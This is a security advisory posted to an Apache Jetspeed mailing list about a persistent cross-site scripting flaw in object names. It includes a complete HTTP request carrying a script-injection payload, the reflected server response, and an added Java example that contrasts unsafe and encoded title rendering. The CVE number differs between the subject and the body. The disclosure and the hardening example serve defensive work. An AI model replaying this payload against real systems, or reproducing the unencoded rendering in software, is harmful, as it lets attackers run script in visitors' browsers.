Posted to jetspeed-user@portals.apache.org by David S Taylor <da...@bluesunrise.com> on 2016/03/03 22:16:37 UTC

[CVE-2016-0711] Apache Jetspeed information disclosure vulnerability

CVE-2016-0710: Persistent Cross Site Scripting in links, pages and folders

Severity: Important

Vendor:
The Apache Software Foundation

Versions Affected:
Jetspeed 2.2.0 to 2.2.2
Jetspeed 2.3.0
The unsupported Jetspeed 2.1.x versions may also be affected

Description:
The functionality to add a link, page, or folder is vulnerable to persistent Cross Site Scripting. It is possible to include HTML tags in the object's name, as in the example below, where a page object is being renamed after creation.

Mitigation:
2.2.0 - 2.3.0 users should upgrade to 2.3.1

Example:
Given this AJAX request:
POST /jetspeed/services/pagemanagement/info/.psml/_user/andreas/foobar.psml?_type=json HTTP/1.1
Host: 192.168.2.4:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.2.4:8080/jetspeed/ui/_user/andreas/foobar.psml
Content-Length: 60
Cookie: JSESSIONID=F95E2034A086BE172EF816FF2C853BE9; JS2TOOLBOX=TAB=theme&CAT=Administration
Connection: close

title=foobar</a></li><script>alert(document.domain)</script>

Which results in the following content in the server response:
<meta http-equiv="content-type" content="text/html; charset=UTF-8"/>
<title>foobar</a></li><script>alert(document.domain)</script></title>

Note that this code will be executed every time someone visits that space.

Credit:
This issue was discovered by Andreas Lindh

References:
http://tomcat.apache.org/security.html
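
Added example (not Jetspeed's code and not the 2.3.1 patch): the unencoded rendering pattern the advisory describes next to an output-encoded version, using the title value from the request above. Class and method names are hypothetical, and the menu-link markup is an assumption suggested by the `</a></li>` in that title value.

```java
public class TitleEncodingExample {

    // Encode the characters that are significant in HTML text and in quoted
    // attribute values, so a stored object name renders as inert text.
    static String escapeHtml(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    // Pattern from the advisory: the stored name is written into markup as-is.
    static String renderTitleUnsafe(String title) {
        return "<title>" + title + "</title>";
    }

    // Hardened: encode at the point of output, whatever was stored.
    static String renderTitleSafe(String title) {
        return "<title>" + escapeHtml(title) + "</title>";
    }

    // Hypothetical menu entry: the name appears in an attribute and in text,
    // and both occurrences are encoded.
    static String renderMenuItemSafe(String path, String title) {
        return "<li><a href=\"" + escapeHtml(path) + "\" title=\"" + escapeHtml(title)
                + "\">" + escapeHtml(title) + "</a></li>";
    }

    public static void main(String[] args) {
        // Sample inputs: a benign name, the title value from the advisory's
        // request, and a constructed name with characters that must survive.
        String[] titles = { "foobar",
            "foobar</a></li><script>alert(document.domain)</script>",
            "R&D \"plans\"" };
        for (String t : titles) {
            System.out.println("unsafe title: " + renderTitleUnsafe(t));
            System.out.println("safe title:   " + renderTitleSafe(t));
            System.out.println("safe menu:    " + renderMenuItemSafe("/_user/andreas/foobar.psml", t));
        }
    }
}
```

Encoding on output rather than stripping on input keeps names such as `R&D "plans"` intact while names already stored with markup are rendered as text.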



